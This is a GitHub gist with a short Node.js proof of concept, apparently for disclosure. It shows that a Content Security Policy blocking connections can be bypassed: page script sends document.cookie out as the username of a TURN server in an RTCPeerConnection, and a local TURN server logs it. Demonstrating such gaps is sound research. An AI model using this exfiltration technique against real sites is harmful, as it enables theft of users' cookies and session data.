Created
May 28, 2022 12:58
-
-
Save MatthiasPortzel/6451fe958fdcf7936c7eb42d295b1bc6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import express from "express"; | |
import Turn from "node-turn"; | |
//App serves user controlled HTML inside of a content security policy | |
//The app can run JS but shouldn't be able to "phone-home" to a remote server | |
//This is untrusted | |
const CODE = `<!DOCTYPE html> | |
<html> | |
<body> | |
<script> | |
//In the vulnerable scenario, | |
//Untrusted code has access to data like cookies that it needs to be able to use | |
//But shouldn't be able to send to a 3rd-party | |
const FLAG = document.cookie || "FLAG"; | |
//This fails like it should. | |
//Also can't load images, etc. | |
//fetch("http://localhost:8002?" + FLAG).then(_ => console.log("Attacked!")).catch(_ => console.log("Blocked by CSP")); | |
//But you can establish a RTCPeerConnection to an untrusted server | |
new RTCPeerConnection({ | |
iceServers: [{ | |
urls: ["turn:127.0.0.1:3478"], | |
//Username field has a max length of 128 bytes, but it's trivial to connect multiple times | |
username: FLAG.slice(0, 127), | |
credential: "1" | |
}], | |
iceCandidatePoolSize: 1 | |
}); | |
</script> | |
</body> | |
</html>`; | |
const app = express(); | |
app.get("/", (req, res) => { | |
res.append("Content-Security-Policy", "default-src none; script-src 'unsafe-inline'") | |
//This should be secure because the CSP should prevent connections | |
res.send(CODE); | |
}); | |
app.listen(8001, console.log) | |
//This is the "malicious" TURN server | |
var server = new Turn({ | |
authMech: 'none', | |
debugLevel: "ALL", | |
debug: function (debugLevel, msg) { | |
if (msg instanceof Error) { | |
throw msg; | |
} | |
// console.log(typeof msg); | |
const match = msg.match(/username: (.*)/); | |
if (match) { | |
console.log("Got FLAG!"); | |
console.log(match[1]); | |
} | |
}, | |
credentials: { | |
username: "password" | |
}, | |
listeningIps: ["127.0.0.1"] | |
}); | |
server.start(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"type": "module", | |
"dependencies": { | |
"express": "^4.17.2", | |
"node-turn": "^0.0.6" | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment